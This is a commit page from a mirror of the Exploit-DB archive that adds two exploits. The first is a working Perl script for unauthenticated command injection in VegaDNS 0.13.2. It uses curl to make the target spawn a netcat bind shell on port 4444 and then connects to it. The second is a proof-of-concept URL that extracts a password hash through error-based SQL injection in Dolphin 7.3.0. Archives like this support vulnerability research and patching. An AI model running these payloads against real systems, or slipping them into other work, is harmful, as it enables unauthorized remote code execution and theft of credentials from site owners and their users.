bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-21

Browse source 
2 new exploits

Dolphin 7.3.0 - Error-Based SQL Injection

VegaDNS 0.13.2 - Remote Command Injection
This commit is contained in:
Offensive Security 2016-09-21 05:07:40 +00:00
parent 91fedcad08
commit fdd9fd65e2
3 changed files with 261 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
files.csv
View file

@ -20403,6 +20403,7 @@ id,file,description,date,author,platform,type,port
23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0
23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - auth.inc.php SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0
23165,platforms/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos,0
40403,platforms/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80
23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0
23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0
23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation",2003-09-22,"Sebastian Krahmer",linux,local,0
@ -21021,6 +21022,7 @@ id,file,description,date,author,platform,type,port
23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0
23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0
23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 - Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0
40402,platforms/php/webapps/40402.pl,"VegaDNS 0.13.2 - Remote Command Injection",2016-09-20,Wireghoul,php,webapps,0
23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos,0
23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0
23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0

Can't render this file because it is too large.

234
platforms/php/webapps/40402.pl Executable file
View file

@ -0,0 +1,234 @@
#!/usr/bin/perl
$izd= qq{
};$vg=qq{
};$b=qq{
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
l
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print " ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;

25
platforms/php/webapps/40403.txt Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection
# Date: 20-09-2016
# Software Link: https://www.boonex.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_REQUEST['key']` is not escaped inside `actions.inc.php`.
http://security.szurek.pl/dolphin-730-error-based-sql-injection.html
2. Proof of Concept
http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a
which is rendered as:
Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>
3. Solution:
Update to version 7.3.1